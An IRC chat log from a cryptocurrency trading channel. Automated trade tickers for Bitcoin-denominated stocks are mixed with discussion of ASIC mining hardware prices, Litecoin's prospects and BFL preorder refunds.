16:06:30 [BTCTC] [ASICMINER-PT] 5 @ 2.877 = 14.385 BTC [+] Aug 28 16:07:27 [BTCTC] [HOSTED-MINING] 3 @ 0.0028 = 0.0084 BTC [+] Aug 28 16:07:27 [BTCTC] [LABCOIN] 50 @ 0.003115 = 0.1558 BTC [+] Aug 28 16:07:29 [BTCTC] [LABCOIN] 125 @ 0.003111 = 0.3889 BTC [-] Aug 28 16:07:31 [BTCTC] [LABCOIN] 450 @ 0.00311 = 1.3995 BTC [-] Aug 28 16:07:50 ThickAsThieves yup, Anduck's delivery. Aug 28 16:08:16 nice Aug 28 16:08:18 [BTCTC] [LABCOIN] 12 @ 0.003111 = 0.0373 BTC [+] Aug 28 16:08:20 [BTCTC] [LABCOIN] 50 @ 0.00311 = 0.1555 BTC [-] Aug 28 16:08:21 [BTCTC] [LABCOIN] 75 @ 0.00307 = 0.2303 BTC [-] Aug 28 16:08:28 apparently they shipped yest Aug 28 16:08:43 [BTCTC] [ACTIVEMINING] 1000 @ 0.00482 = 4.82 BTC [+] Aug 28 16:08:43 how much does this hash and cost? Aug 28 16:09:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.02781 = 0.2781 BTC [-] Aug 28 16:09:54 [BTCTC] [ACTIVEMINING] 2000 @ 0.00482 = 9.64 BTC [+] Aug 28 16:10:51 [BTCTC] [ACTIVEMINING] 250 @ 0.004521 = 1.1303 BTC [-] Aug 28 16:10:53 [BTCTC] [ACTIVEMINING] 1000 @ 0.00452 = 4.52 BTC [-] Aug 28 16:10:53 [BTCTC] [ACTIVEMINING] 135 @ 0.004511 = 0.609 BTC [-] Aug 28 16:10:54 [BTCTC] [ACTIVEMINING] 540 @ 0.00451 = 2.4354 BTC [-] Aug 28 16:10:55 [BTCTC] [ACTIVEMINING] 175 @ 0.004452 = 0.7791 BTC [-] Aug 28 16:10:56 [BTCTC] [ACTIVEMINING] 200 @ 0.004451 = 0.8902 BTC [-] Aug 28 16:10:58 [BTCTC] [ACTIVEMINING] 500 @ 0.00445 = 2.225 BTC [-] Aug 28 16:10:59 [BTCTC] [ACTIVEMINING] 50 @ 0.004401 = 0.2201 BTC [-] Aug 28 16:11:00 [BTCTC] [ACTIVEMINING] 200 @ 0.0044 = 0.88 BTC [-] Aug 28 16:11:01 [BTCTC] [ACTIVEMINING] 25 @ 0.004352 = 0.1088 BTC [-] Aug 28 16:11:02 [BTCTC] [ACTIVEMINING] 80 @ 0.004351 = 0.3481 BTC [-] Aug 28 16:11:03 [BTCTC] [ACTIVEMINING] 20 @ 0.004351 = 0.087 BTC [-] Aug 28 16:11:03 [BTCTC] [ACTIVEMINING] 212 @ 0.004336 = 0.9192 BTC [-] Aug 28 16:11:04 [BTCTC] [ACTIVEMINING] 850 @ 0.004335 = 3.6848 BTC [-] Aug 28 16:11:05 [BTCTC] [ACTIVEMINING] 763 @ 0.004331 = 3.3046 BTC [-] Aug 28 16:11:24 ystarnaud something >1gh/watt Aug 28 16:11:32 nice Aug 28 16:11:36 [BTCTC] [ASICMINER-PT] 1 @ 2.877 BTC [+] Aug 28 16:11:37 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [+] Aug 28 16:11:38 [BTCTC] [ASICMINER-PT] 1 @ 2.895 BTC [+] Aug 28 16:11:40 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [+] Aug 28 16:11:41 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [+] Aug 28 16:11:42 [BTCTC] [ASICMINER-PT] 4 @ 2.9 = 11.6 BTC [+] Aug 28 16:11:43 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Aug 28 16:11:44 [BTCTC] [ASICMINER-PT] 1 @ 2.905 BTC [+] Aug 28 16:11:44 [BTCTC] [ASICMINER-PT] 1 @ 2.908 BTC [+] Aug 28 16:11:45 [BTCTC] [ASICMINER-PT] 1 @ 2.909 BTC [+] Aug 28 16:11:46 [BTCTC] [ASICMINER-PT] 1 @ 2.909 BTC [+] Aug 28 16:11:47 [BTCTC] [ASICMINER-PT] 1 @ 2.909 BTC [+] Aug 28 16:12:08 [BTCTC] [ASICMINER-PT] 7 @ 2.91 = 20.37 BTC [+] Aug 28 16:12:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.02713 = 0.0543 BTC [-] Aug 28 16:12:20 oh asicminer Aug 28 16:12:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.02712 = 0.0542 BTC [-] Aug 28 16:12:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.0271 = 0.271 BTC [-] Aug 28 16:12:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.02707 = 0.0541 BTC [-] Aug 28 16:12:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.02706 = 0.2706 BTC [-] Aug 28 16:12:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.02703 = 0.0541 BTC [-] Aug 28 16:12:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.02702 = 0.2702 BTC [-] Aug 28 16:12:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Aug 28 16:12:39 here we go :). Aug 28 16:12:39 [BTCTC] [ASICMINER-PT] 5 @ 2.91 = 14.55 BTC [+] Aug 28 16:12:42 lmao nice tandem Aug 28 16:12:49 just people buying up to get divs i bet Aug 28 16:12:54 then its gonna come back way down Aug 28 16:13:08 its gonna be low this week Aug 28 16:13:19 Div's are going to be low indeed Aug 28 16:13:21 asicminer up on news of bitfury delivery. locig! Aug 28 16:13:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.02782 = 0.2782 BTC [+] Aug 28 16:13:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.02783 = 0.4175 BTC [+] Aug 28 16:13:42 [BTCTC] [LABCOIN] 85 @ 0.003201 = 0.2721 BTC [+] Aug 28 16:13:44 [BTCTC] [LABCOIN] 477 @ 0.0032 = 1.5264 BTC [-] Aug 28 16:13:53 I wonder now that they are pushing sales of their old blades Aug 28 16:13:53 [BTCTC] [LABCOIN] 85 @ 0.003297 = 0.2802 BTC [+] Aug 28 16:13:54 [BTCTC] [LABCOIN] 137 @ 0.003298 = 0.4518 BTC [+] Aug 28 16:14:05 when will they bring the news of Gen 2? Aug 28 16:14:17 Possibly not to fast, they first need to sell all that old HW Aug 28 16:14:31 well, this is an age old problem in the semiconductor business Aug 28 16:14:34 oh wow 3.9BTC/10GH blades? Aug 28 16:14:44 ystarnaud yes something like that. Aug 28 16:14:53 San1ty-Work a company once imploded over this exact problem. Aug 28 16:14:56 thats pretty low compared to what it used to be Aug 28 16:15:07 it ain't going any other way than down baby. Aug 28 16:15:15 [BTCTC] [LABCOIN] 1438 @ 0.00335 = 4.8173 BTC [+] Aug 28 16:15:31 ;;nethash Aug 28 16:15:32 549512.548233 Aug 28 16:15:39 mining BTC is nuts anyway... Aug 28 16:15:46 ;;calc 54951.2548233*3.9 Aug 28 16:15:46 214309.893811 Aug 28 16:15:58 the total value of mining gear currently deployed = 214k Aug 28 16:16:19 the total value of the one mining company ~= 550k Aug 28 16:16:28 the total value of all mining scams = 1.2mn ? Aug 28 16:16:36 lol Aug 28 16:17:11 lol doesn't begin to cover it >D Aug 28 16:17:41 got dc'd a while Aug 28 16:17:45 [BTCTC] [BITVPS] 99 @ 0.0025 = 0.2475 BTC [+] Aug 28 16:17:45 ugh internet connection sucks here Aug 28 16:18:07 idk but if you really wanna mine, go scrypt imo... SHA256 is just saturated Aug 28 16:18:27 what's the scrypt barrier to entry ? Aug 28 16:18:33 it will saturate within months. Aug 28 16:18:41 Diff has already gotten jacked in LTC Aug 28 16:18:53 [BTCTC] [DMS.MINING] 570 @ 0.003595 = 2.0492 BTC [+] Aug 28 16:18:54 [BTCTC] [DMS.MINING] 430 @ 0.003597 = 1.5467 BTC [+] Aug 28 16:18:56 with little to no follow through in price Aug 28 16:19:05 that'll quickly becvome a problem. Aug 28 16:19:13 what from 800-970? it goes back down every other change Aug 28 16:19:16 its not so bad Aug 28 16:19:17 [BTCTC] [DMS.MINING] 49 @ 0.003597 = 0.1763 BTC [+] Aug 28 16:19:30 and people are too focused on buying up ASICs right now Aug 28 16:19:32 bitcoin is one of those markets, like television, where being #1 pays. being #2 maybe can be made stable if you cut corners. the rest however is a money black hole. Aug 28 16:19:34 ltc nethash seems to be generally stable Aug 28 16:19:47 the avenue through which this will be realised will vbe exactly mining diff/price relationship Aug 28 16:19:50 it only exists for bitcoin. Aug 28 16:20:04 the price drop of LTC is only cause BTC went up... the value is the same as it was approximatly Aug 28 16:20:15 The diff for ltc was a 100 in April Aug 28 16:20:17 this is the sad reality of LTC Aug 28 16:20:27 [BTCTC] [LABCOIN] 1 @ 0.0033 BTC [-] Aug 28 16:20:29 it lives only cuz bitcoin Aug 28 16:20:32 true Aug 28 16:20:35 nevermind 100... used to be 15 when i started lol Aug 28 16:20:37 its the old gpu miners last resort Aug 28 16:20:39 [HAVELOCK] [LABCO] 2 @ 0.0032 = 0.0064 BTC [+] Aug 28 16:20:42 yet is not reliable enough to be a solid hedge Aug 28 16:20:46 but its been 800-970 for the past 2 months or so not bad Aug 28 16:20:48 [BTCTC] [BITVPS] 99 @ 0.00265 = 0.2624 BTC [+] Aug 28 16:20:50 fucking paranoid people. i have spent all my morning so far entering passwords. Aug 28 16:20:50 it only gets the bad side Aug 28 16:20:55 WHY CANT WE JUST GET ALONG Aug 28 16:21:09 hahah Aug 28 16:21:50 it ltc always went up when bitcoin went down, itd be pretty cool Aug 28 16:21:53 [HAVELOCK] [LABCO] 3 @ 0.0031999 = 0.0096 BTC [-] Aug 28 16:22:00 but it seems to only go down when bitcoin goes up Aug 28 16:22:05 [HAVELOCK] [AM100] 1 @ 0.0265 BTC [+] Aug 28 16:22:06 ;;echo .d Aug 28 16:22:06 lol Aug 28 16:22:06 .d Aug 28 16:22:07 65750060.14908 | Next Diff in 1371 blocks | Estimated Change: 13.0049% in 8d 6h 24m 15s Aug 28 16:22:14 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Aug 28 16:23:01 and then it behaves wtf otherwise Aug 28 16:23:51 I don't think its that bad... its been around 2.3-2.5 USD per LTC for the past few months Aug 28 16:24:13 chexck the chart against bitcoin Aug 28 16:24:18 it's inverse Aug 28 16:24:29 well it's been relative to bitcoin to USD value Aug 28 16:24:50 does the LTC/USD price not follow? Aug 28 16:25:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.02782 = 0.1669 BTC [-] Aug 28 16:25:31 the LTC/USD fluctuates of course... but generally stays the same ratio... the LTC/BTC ratio varies so that LTC/USD stays the same vs BTC/USD Aug 28 16:25:53 if that makes sense Aug 28 16:25:58 [BTCTC] [TAT.ASICMINER] 45 @ 0.02783 = 1.2524 BTC [+] Aug 28 16:26:06 so it follows Aug 28 16:26:11 would be interesting if it didnt Aug 28 16:26:17 again, the problem with ltc... Aug 28 16:26:52 basically the last hope is that the exchanges will take it seriously Aug 28 16:27:17 if Gox carries it, Coinbase carries it, and then the btc stock exchanges weave it in Aug 28 16:27:22 it might have a life Aug 28 16:27:30 but at the expense of bitcoin Aug 28 16:27:35 [BTCTC] [LABCOIN] 150 @ 0.003398 = 0.5097 BTC [+] Aug 28 16:27:45 Only so many dollars chasing crypto Aug 28 16:27:53 like a few weeks ago... (cant remember exact numbers but around those...) LTC was 2.4USD... BTC 96 USD... you had a ratio of 0.025LTC/BTC... now its like 2.35LTC/USD and BTC is 115BTC/USD for a ratio of 0.0204LTC/BTC Aug 28 16:28:00 btc-e numbers that is Aug 28 16:28:58 ThickAsThieves: yeah thats true... more and more merchants seem to also accept it along with BTC tho which is nice Aug 28 16:29:10 [BTCTC] [LABCOIN] 49 @ 0.003398 = 0.1665 BTC [+] Aug 28 16:30:04 i kinda feel the exchanges should not support ltc Aug 28 16:30:23 it muddies the water Aug 28 16:30:48 i see it as a good alternative to BTC Aug 28 16:30:59 ystarnaud certainly a good back-up to have just in case. Aug 28 16:31:00 for trading smaller amounts maybe Aug 28 16:31:05 The only thing I see useful if btct supported ltc, is buying up more ltc global shares Aug 28 16:31:16 ThickAsThieves my guess is it muddies the waters FOR LTC. much bnetter for it to have its own Aug 28 16:31:21 Newcomer hears about bitcoin, begins to read up, chooses an exchange, deposits $ into account, then sees litecoins for sales and goes uhhh wtf Aug 28 16:31:23 [MPEX] [S.MPOE] 3336 @ 0.00087314 = 2.9128 BTC [-] Aug 28 16:31:23 [MPEX] [S.MPOE] 6833 @ 0.00087158 = 5.9555 BTC [-] Aug 28 16:31:27 mircea_popescu: yeah exactly Aug 28 16:31:37 I'm sure as hell am not going to convert my money just to transfer over to ltc exchange for the shares Aug 28 16:31:37 [MPEX] [S.MPOE] 3481 @ 0.00086979 = 3.0277 BTC [-] Aug 28 16:32:16 [HAVELOCK] [AM100] 3 @ 0.0265 = 0.0795 BTC [+] Aug 28 16:33:16 Labcoin scamvestigation? https://bitcointalk.org/index.php?topic=263445.msg3026324#msg3026324 Aug 28 16:33:29 oh boy Aug 28 16:33:53 duh. Aug 28 16:34:03 que burnside explaining how he had a lot of respect for mpoe-pr Aug 28 16:34:03 [HAVELOCK] [CFIG] 1 @ 0.1702 BTC [-] Aug 28 16:34:05 [HAVELOCK] [CFIG] 4 @ 0.17 = 0.68 BTC [-] Aug 28 16:34:13 everything's a scam lol Aug 28 16:34:21 ystarnaud not quite everything Aug 28 16:34:32 i am puzzled why burnside is disappointed by the chat log Aug 28 16:34:41 it was no different then the thread Aug 28 16:34:42 what chat log ? Aug 28 16:34:46 here Aug 28 16:34:46 mircea_popescu: I meant according to forums haha Aug 28 16:35:24 than* Aug 28 16:35:34 who the fuck is appointed in a chat log in the first place. am i missing something ? Aug 28 16:37:13 [BTCTC] [BASIC-MINING] 1 @ 0.215 BTC [+] Aug 28 16:37:15 [BTCTC] [BASIC-MINING] 3 @ 0.2181 = 0.6543 BTC [+] Aug 28 16:37:18 pale pheonix basically turning the thing into some kinda fight Aug 28 16:37:24 [BTCTC] [LABCOIN] 84 @ 0.003321 = 0.279 BTC [-] Aug 28 16:37:25 [BTCTC] [LABCOIN] 425 @ 0.00332 = 1.411 BTC [-] Aug 28 16:37:27 [BTCTC] [LABCOIN] 75 @ 0.003151 = 0.2363 BTC [-] Aug 28 16:37:28 [BTCTC] [LABCOIN] 300 @ 0.00315 = 0.945 BTC [-] Aug 28 16:37:44 [HAVELOCK] [XBOND] 1 @ 0.001295 BTC [+] Aug 28 16:37:46 ya well. Aug 28 16:37:50 points can be made about me, therefore what right do i have to make points Aug 28 16:38:48 here's an open secret : bitcoin is much like south africa back when it worked, an apartheid system. forumers, redditors and co are 2nd class citizens. we don't give a shit about them. Aug 28 16:38:54 [BTCTC] [LABCOIN] 37 @ 0.003149 = 0.1165 BTC [-] Aug 28 16:38:54 [BTCTC] [LABCOIN] 56 @ 0.00315 = 0.1764 BTC [+] Aug 28 16:38:57 [BTCTC] [LABCOIN] 30 @ 0.003022 = 0.0907 BTC [-] Aug 28 16:39:03 of course, unlike south africa the apartheid is voluntary, and reflects merit rather than birth Aug 28 16:39:07 nevertheless, it's what it is. Aug 28 16:39:35 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 28 16:39:37 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 28 16:39:38 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [-] Aug 28 16:39:39 [BTCTC] [ASICMINER-PT] 27 @ 2.91 = 78.57 BTC [+] Aug 28 16:39:55 gogogo Aug 28 16:40:10 [HAVELOCK] [AM100] 19 @ 0.0265 = 0.5035 BTC [+] Aug 28 16:40:23 [BTCTC] [ASICMINER-PT] 1 @ 2.91 BTC [+] Aug 28 16:40:27 [HAVELOCK] [XBOND] 2 @ 0.001295 = 0.0026 BTC [+] Aug 28 16:42:50 [BTCTC] [ASICMINER-PT] 25 @ 2.91 = 72.75 BTC [+] Aug 28 16:42:54 [BTCTC] [ACTIVEMINING] 100 @ 0.00441 = 0.441 BTC [+] Aug 28 16:43:38 [HAVELOCK] [AM100] 1 @ 0.02699 BTC [+] Aug 28 16:43:48 [BTCTC] [LABCOIN] 100 @ 0.003033 = 0.3033 BTC [+] Aug 28 16:44:35 [BTCTC] [TAT.ASICMINER] 14 @ 0.0267 = 0.3738 BTC [-] Aug 28 16:44:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.0267 = 0.1602 BTC [-] Aug 28 16:44:49 [BTCTC] [ASICMINER-PT] 1 @ 2.913 BTC [+] Aug 28 16:45:25 cue AM rally in 10 minutes Aug 28 16:45:38 [BTCTC] [ASICMINER-PT] 1 @ 2.913 BTC [+] Aug 28 16:45:39 [BTCTC] [ASICMINER-PT] 1 @ 2.915 BTC [+] Aug 28 16:45:40 (testing a theory) Aug 28 16:45:41 [BTCTC] [ASICMINER-PT] 2 @ 2.918 = 5.836 BTC [+] Aug 28 16:45:51 [BTCTC] [LABCOIN] 4 @ 0.003032 = 0.0121 BTC [-] Aug 28 16:45:53 [BTCTC] [LABCOIN] 64 @ 0.003032 = 0.194 BTC [-] Aug 28 16:46:16 [BTCTC] [LABCOIN] 71 @ 0.003036 = 0.2156 BTC [+] Aug 28 16:46:17 [BTCTC] [LABCOIN] 129 @ 0.003035 = 0.3915 BTC [-] Aug 28 16:46:24 [BTCTC] [TAT.ASICMINER] 14 @ 0.02781 = 0.3893 BTC [+] Aug 28 16:46:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.02782 = 0.1113 BTC [+] Aug 28 16:46:26 [BTCTC] [TAT.ASICMINER] 196 @ 0.02783 = 5.4547 BTC [+] Aug 28 16:46:27 [BTCTC] [TAT.ASICMINER] 27 @ 0.02783 = 0.7514 BTC [+] Aug 28 16:46:28 [BTCTC] [TAT.ASICMINER] 20 @ 0.02784 = 0.5568 BTC [+] Aug 28 16:46:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.02789 BTC [+] Aug 28 16:46:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.02789 = 0.2789 BTC [+] Aug 28 16:46:31 [BTCTC] [TAT.ASICMINER] 50 @ 0.0279 = 1.395 BTC [+] Aug 28 16:46:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0282 BTC [+] Aug 28 16:46:34 [BTCTC] [TAT.ASICMINER] 50 @ 0.02828 = 1.414 BTC [+] Aug 28 16:46:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0283 BTC [+] Aug 28 16:46:35 [BTCTC] [TAT.ASICMINER] 26 @ 0.0284 = 0.7384 BTC [+] Aug 28 16:46:46 ok not even 10min mayve Aug 28 16:46:47 [BTCTC] [ASICMINER-PT] 1 @ 2.95 BTC [+] Aug 28 16:46:50 [BTCTC] [TAT.ASICMINER] 6 @ 0.0284 = 0.1704 BTC [+] Aug 28 16:47:01 10sek more like Aug 28 16:47:08 [BTCTC] [TAT.ASICMINER] 32 @ 0.0284 = 0.9088 BTC [+] Aug 28 16:47:11 [BTCTC] [ASICMINER-PT] 3 @ 2.97 = 8.91 BTC [+] Aug 28 16:47:28 [BTCTC] [ASICMINER-PT] 2 @ 2.971 = 5.942 BTC [+] Aug 28 16:48:02 [BTCTC] [ASICMINER-PT] 1 @ 2.972 BTC [+] Aug 28 16:48:08 "Price of BFL Single: $2499 for 50Ghs. Price for 5x AM blades: 3.5btc x 5 x 130 = $2275 for 50Ghs. Every single BFL device that has been pre-ordered just got undercut. I would expect nearly every rational actor with a BFL preorder to cancel immediately. Friedcat just bankrupted them." Aug 28 16:48:30 lol Aug 28 16:48:34 [BTCTC] [ASICMINER-PT] 1 @ 2.92 BTC [-] Aug 28 16:48:35 ugh BFL Aug 28 16:48:37 [BTCTC] [ASICMINER-PT] 2 @ 2.973 = 5.946 BTC [+] Aug 28 16:48:56 bfl stopped doing refunds when they started shipping Aug 28 16:49:15 you can get a refund through a painful process if you used paypal i think... Aug 28 16:49:35 i know ppl that are failing at that... Aug 28 16:49:45 class action eventually Aug 28 16:49:55 Yeah Aug 28 16:50:06 There is a big movement to get a class action lawsuit going Aug 28 16:50:12 i personally just wrote off my $1300ish paid for a single... and moving on Aug 28 16:50:20 [BTCTC] [BTC-GROWTH] 3 @ 0.09781 = 0.2934 BTC [+] Aug 28 16:50:22 [BTCTC] [BTC-GROWTH] 1 @ 0.0978 BTC [-] Aug 28 16:50:22 [BTCTC] [BTC-GROWTH] 1 @ 0.0977 BTC [-] Aug 28 16:50:23 [BTCTC] [BTC-GROWTH] 28 @ 0.09761 = 2.7331 BTC [-] Aug 28 16:50:44 [BTCTC] [HOSTED-MINING] 100 @ 0.00279 = 0.279 BTC [-] Aug 28 16:51:12 [BTCTC] [LABCOIN] 71 @ 0.003388 = 0.2405 BTC [+] Aug 28 16:51:13 [BTCTC] [LABCOIN] 266 @ 0.003389 = 0.9015 BTC [+] Aug 28 16:51:30 [BTCTC] [ASICMINER-PT] 3 @ 2.97 = 8.91 BTC [-] Aug 28 16:52:49 [BTCTC] [ASICMINER-PT] 1 @ 2.97 BTC [-] Aug 28 16:53:33 interesting, so am is selling 10gh at 3.5, bitfury 10gh at 3.9 ? Aug 28 16:53:50 pricewar ? Aug 28 16:54:04 race to the bottom Aug 28 16:54:13 I have a couple of singles to get money for, I'm not letting that go so easily. Nor do I let money just go to waste. Aug 28 16:54:25 so basicalyl we'll be at ~.2btc / gh within about two weeks ? Aug 28 16:54:27 I've already contacted the KS AG Aug 28 16:54:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [+] Aug 28 16:54:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.0286 = 0.286 BTC [+] Aug 28 16:55:14 [BTCTC] [ACTIVEMINING] 4 @ 0.0045 = 0.018 BTC [+] Aug 28 16:55:15 i wonder if the am victorious muppets realise that undercutting bfl means am just undercut its own stock. Aug 28 16:55:19 until now there was no call for a pricewar Aug 28 16:55:25 [HAVELOCK] [AM100] 6 @ 0.0265 = 0.159 BTC [-] Aug 28 16:55:39 requires competition Aug 28 16:55:41 how much do they have online, like 10th ? Aug 28 16:55:43 [BTCTC] [BITVPS] 1 @ 0.00241 BTC [-] Aug 28 16:55:52 AM? Aug 28 16:55:54 yes Aug 28 16:55:58 45-60TH Aug 28 16:56:06 ;;calc 60 * 3500 Aug 28 16:56:07 210000 Aug 28 16:56:10 [BTCTC] [TAT.MINIGAME] 14 @ 0.0002301 = 0.0032 BTC [-] Aug 28 16:56:12 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Aug 28 16:56:29 so .5 btc per share at their own blade prices Aug 28 16:56:42 [BTCTC] [TAT.ASICMINER] 44 @ 0.02864 = 1.2602 BTC [+] Aug 28 16:56:49 the move from ~4 to 3.5 was a good 15% sliced offa there. Aug 28 16:56:59 if it goes to two, it's a further -40% Aug 28 16:57:14 [BTCTC] [RSM] 1 @ 0.01127 BTC [-] Aug 28 16:57:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02864 BTC [+] Aug 28 16:58:19 the market will price based on divs mostly Aug 28 16:58:27 Ukyo: http://www.btcpie.com/blog_2013/08/bitfunder%ef%bc%88weexchange-%e6%b3%a8%e5%86%8c%e5%8f%8a%e5%85%85%e5%80%bc%e6%8c%87%e5%8d%97 some chinese guys created a tutorial on how to register @ bf, maybe this is useful for you Aug 28 16:58:36 [HAVELOCK] [SDSTM] 1 @ 0.0045 BTC [+] Aug 28 16:58:40 Looks like CoinTerra has the most competitive pricing yet: http://www.coindesk.com/cointerra-cuts-price-of-terraminer-iv-bitcoin-mining-rig/ Aug 28 16:58:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00109 BTC [-] Aug 28 16:58:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00109 BTC [-] Aug 28 16:58:49 [MPEX] [S.MPOE] 4750 @ 0.00087464 = 4.1545 BTC [+] Aug 28 16:58:51 [MPEX] [S.MPOE] 280 @ 0.00088021 = 0.2465 BTC [+] Aug 28 16:58:56 13,999 for 2TH/s Aug 28 16:58:57 but CoinTerra isnt relevant til xmas Aug 28 16:59:03 This is true. Aug 28 16:59:05 Or after, really. Aug 28 16:59:06 [BTCTC] [ACTIVEMINING] 708 @ 0.0045 = 3.186 BTC [+] Aug 28 16:59:06 [BTCTC] [ACTIVEMINING] 200 @ 0.00441 = 0.882 BTC [-] Aug 28 16:59:09 likely Aug 28 16:59:09 [HAVELOCK] [LABCO] 1 @ 0.0033 BTC [+] Aug 28 16:59:28 Still 4x cheaper might be relevant. Aug 28 16:59:29 or maybe they are actually smart Aug 28 16:59:30 [BTCTC] [ASICMINER-PT] 1 @ 2.955 BTC [-] Aug 28 16:59:35 and are internally aoiming for Halloween Aug 28 16:59:40 and publicly saying xmas Aug 28 17:00:02 Overdelivering? On an ASIC?!? Aug 28 17:00:06 hehe Aug 28 17:00:28 [BTCTC] [TAT.ASICMINER] 20 @ 0.02864 = 0.5728 BTC [+] Aug 28 17:00:29 Can you imagine how much bitjizz would be launched over that? Aug 28 17:00:30 [BTCTC] [TAT.ASICMINER] 19 @ 0.02864 = 0.5442 BTC [+] Aug 28 17:00:38 kleeck we're discussing things you can buy tho, not things people want to sell you. Aug 28 17:01:13 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00109 = 0.0033 BTC [-] Aug 28 17:01:23 [BTCTC] [TAT.ASICMINER] 11 @ 0.02864 = 0.315 BTC [+] Aug 28 17:01:29 Yes. So is AM currently the $/GH winner? Aug 28 17:01:37 for the moment Aug 28 17:01:39 at 3.5 yeah] Aug 28 17:02:02 someone here who can translate: 接电话的人是个科学怪人 ? Aug 28 17:02:03 i think they said this batch is about 200th Aug 28 17:02:04 hmm Aug 28 17:02:05 nvm Aug 28 17:02:09 avalon isn't doing too well apparently, which leaves pretty much vbitfury with actual chips Aug 28 17:02:12 not sure how much goes to farm/sales/franchise Aug 28 17:02:31 dexX7_ some complaint about someone answering a phone Aug 28 17:02:32 ;;nethash Aug 28 17:02:32 549898.297877 Aug 28 17:02:54 We need a translation bot in here Aug 28 17:02:56 ThickAsThieves bitfury ? didn't they say it's 4ph or some scandalous shit like that ? Aug 28 17:02:59 That would be neat Aug 28 17:03:04 AM Aug 28 17:03:15 Rulother we used to have it two years ago. then google went apeshiot and banned api access. Aug 28 17:03:17 this batch of blades and USBs I meant Aug 28 17:03:20 a Aug 28 17:03:32 接电话的人是个科学怪人 = Frankenstein Aug 28 17:03:45 [BTCTC] [TAT.ASICMINER] 24 @ 0.02864 = 0.6874 BTC [+] Aug 28 17:04:02 hehe well, my irc client doesn't show the characters, but fine. frankenstein is what google tells me, too. but that sounds wrong. Aug 28 17:04:31 http://www.coindesk.com/bitmine-to-drop-4phs-of-asic-power-onto-bitcoin-network-before-april/ Aug 28 17:04:50 Jiē diànhuà de rén shìgè kēxué guàirén < they who answered the phone were weird. Aug 28 17:04:51 [BTCTC] [ACTIVEMINING] 7 @ 0.0044 = 0.0308 BTC [-] Aug 28 17:04:52 [BTCTC] [ACTIVEMINING] 1 @ 0.0044 BTC [-] Aug 28 17:04:53 [BTCTC] [ACTIVEMINING] 25 @ 0.004341 = 0.1085 BTC [-] Aug 28 17:04:55 [BTCTC] [ACTIVEMINING] 100 @ 0.00434 = 0.434 BTC [-] Aug 28 17:04:55 [BTCTC] [ACTIVEMINING] 365 @ 0.004332 = 1.5812 BTC [-] Aug 28 17:04:57 [BTCTC] [ACTIVEMINING] 1000 @ 0.004331 = 4.331 BTC [-] Aug 28 17:04:57 [BTCTC] [ACTIVEMINING] 2000 @ 0.00433 = 8.66 BTC [-] Aug 28 17:04:58 [BTCTC] [ACTIVEMINING] 510 @ 0.004329 = 2.2078 BTC [-] Aug 28 17:05:00 [BTCTC] [ACTIVEMINING] 300 @ 0.004301 = 1.2903 BTC [-] Aug 28 17:05:01 [BTCTC] [ACTIVEMINING] 200 @ 0.0042 = 0.84 BTC [-] Aug 28 17:05:16 :D Aug 28 17:05:27 thanks Aug 28 17:05:34 [BTCTC] [ASICMINER-PT] 1 @ 2.95 BTC [-] Aug 28 17:05:36 [BTCTC] [ASICMINER-PT] 5 @ 2.955 = 14.775 BTC [+] Aug 28 17:05:41 4PH in March now? Aug 28 17:05:46 heh Aug 28 17:05:55 admittedly the last part could in some contexts be frankenstein but apparently it's not the case or w/e. chinese shit. Aug 28 17:06:02 "Massive Luck Investments, which has offices in places including Manila and the UK, is a relatively new entrant to the bitcoin space. " Aug 28 17:06:03 lol Aug 28 17:06:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.02869 = 0.1721 BTC [+] Aug 28 17:06:44 “We had a board meeting which put together a small research group, tasked with making an initial assessment of business opportunities in the fledgling digital currency area. The team presented its report in early January, and the report identified the digital currencies as a potential area of disruptive technological breakthroughs, and a very promising investment opportunity.” Aug 28 17:06:52 frankenstein = "one who is weird" seems appropriate, thanks Aug 28 17:06:56 [BTCTC] [TAT.ASICMINER] 35 @ 0.0287 = 1.0045 BTC [+] Aug 28 17:07:09 ok so my rally theory didnt pan out Aug 28 17:07:14 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 28 17:07:42 “The Chinese government provides preferential policies to attract FDI [foreign direct investment] in certain high tech areas that benefit the Chinese economy,” said the Massive Luck exec. “They require traditional CPU-based traditional computing power to address the acute shortage of it. Shanghai supercomputer center will be responsible for the overall facility design and staff Aug 28 17:07:42 training.” Aug 28 17:08:32 [BTCTC] [DMS.MINING] 15 @ 0.00369 = 0.0554 BTC [+] Aug 28 17:08:33 [BTCTC] [DMS.MINING] 1 @ 0.00369 BTC [+] Aug 28 17:08:34 [BTCTC] [DMS.MINING] 138 @ 0.00369 = 0.5092 BTC [+] Aug 28 17:10:15 [BTCTC] 